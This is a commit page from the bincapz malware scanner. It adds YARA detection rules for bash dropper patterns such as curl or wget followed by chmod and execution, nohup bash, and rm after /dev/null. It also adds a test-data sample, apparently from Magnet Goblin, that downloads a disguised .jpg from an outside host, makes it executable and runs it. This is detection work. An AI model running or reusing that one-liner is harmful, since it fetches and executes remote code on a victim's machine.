Merge pull request #47 from tstromberg/main

Improve rules through Magnet Goblin analysis
chainguard-dev · Mar 12, 2024 · c79c190 · c79c190
2 parents 0e80e4a + 4870998
commit c79c190
Show file tree

Hide file tree

Showing 6 changed files with 60 additions and 50 deletions.
diff --git a/bincapz.go b/bincapz.go
@@ -23,7 +23,7 @@ func main() {
 	minLevelFlag := flag.Int("min-level", 1, "minimum suspicion level to report (1=low, 2=medium, 3=high, 4=critical)")
 	thirdPartyFlag := flag.Bool("third-party", true, "include third-party rules, which may have licensing restrictions")
 	omitEmptyFlag := flag.Bool("omit-empty", false, "omit files that contain no matches")
-	includeDataFilesFlag := flag.Bool("include-data-files", false, "include files that are detected to as non-program (binary or source) files")
+	includeDataFilesFlag := flag.Bool("data-files", false, "include files that are detected to as non-program (binary or source) files")
 	allFlag := flag.Bool("all", false, "Ignore nothing, show all")
 
 	klog.InitFlags(nil)

diff --git a/rules/combo/dropper/bash.yara b/rules/combo/dropper/bash.yara
@@ -0,0 +1,54 @@
+rule fetch_chmod_run_oneliner_value : suspicious {
+	meta:
+		description = "fetches, chmods, and runs a program"
+	strings:
+		$ref = /[a-z](url|get) .{4,64}chmod .{4,64}\.\/[a-z]{1,16}/
+	condition:
+		any of them
+}
+
+rule curl_chmod_relative_run : suspicious {
+  meta:
+	description = "fetches file, makes it executable, runs it"
+  strings:
+	$chmcurlod = /curl [\-\w \$\@\{\w\/\.\:]{0,96}/
+	$chmod = /chmod [\-\w \$\@\{\w\/\.]{0,64}/
+	$dot_slah = /\.\/[a-z]{1,2}[a-z\.\/\- ]{0,32}/ fullword
+  condition:
+	all of them
+}
+
+rule wget_chmod_relative_run : suspicious {
+  meta:
+	description = "fetches file, makes it executable, runs it"
+  strings:
+	$chmcurlod = /wget [\-\w \$\@\{\w\/\.\:]{0,96}/
+	$chmod = /chmod [\-\w \$\@\{\w\/\.]{0,64}/
+	$dot_slah = /\.\/[a-z]{1,2}[a-z\.\/\- ]{0,32}/ fullword
+  condition:
+	all of them
+}
+
+rule dev_null_rm : notable {
+  strings:
+    $dev_null_rm = /[ \w\.\/\&\-%]{0,32}\/dev\/null\;rm[ \w\/\&\.\-\%]{0,32}/
+  condition:
+    any of them
+}
+
+rule sleep_rm : notable {
+  strings:
+    $dev_null_rm = /sleep;rm[ \w\/\&\.\-\%]{0,32}/
+  condition:
+    any of them
+}
+
+
+rule nohup_bash_background : suspicious {
+  strings:
+	$ref = /nohup bash [\%\w\/\>]{0,64} &/
+  condition:
+    any of them
+}
+
+
diff --git a/rules/combo/dropper/bash_oneliner.yara b/rules/combo/dropper/bash_oneliner.yara
diff --git a/rules/combo/dropper/fetch_chmod_dot_slash.yara b/rules/combo/dropper/fetch_chmod_dot_slash.yara
diff --git a/rules/net/fetch.yara b/rules/net/fetch.yara
@@ -1,9 +1,9 @@
 
-rule curl : notable {
+rule curl_value : notable {
 	meta:
 		description = "Invokes curl"
 	strings:
-		$ref = /curl [\w\- :\"\/]{0,64}-o[\w\- :\"\/]{0,64}/
+		$ref = /curl [\w\.\- :\"\/]{0,64}/
 	condition:
 		$ref
 }
@@ -12,7 +12,7 @@ rule curl_download : notable {
 	meta:
 		description = "Invokes curl to download a file"
 	strings:
-		$ref = /curl [\w\- :\"\/]{0,64}-[oO][\w\- :\"\/]{0,64}/
+		$ref = /curl [\w\.\- :\"\/]{0,64}-[oO][\w\- :\"\/]{0,64}/
 	condition:
 		$ref
 }
@@ -21,7 +21,7 @@ rule curl_agent : suspicious {
 	meta:
 		description = "Invokes curl with a custom user agent"
 	strings:
-		$ref = /curl [\w\- :\"\/]{0,64}-a[ "][\w\- :\"\/]{0,64}/
+		$ref = /curl [\w\.\- :\"\/]{0,64}-a[ "][\w\- :\"\/]{0,64}/
 	condition:
 		$ref
 }

diff --git a/testdata/Linux/magnet_goblin_dropper.sh b/testdata/Linux/magnet_goblin_dropper.sh
@@ -0,0 +1 @@
+cd pub; cd media; curl https://theroots.in/pub/media/avatar/223sam.jpg -o cli &&chmod +xcli&&./cli;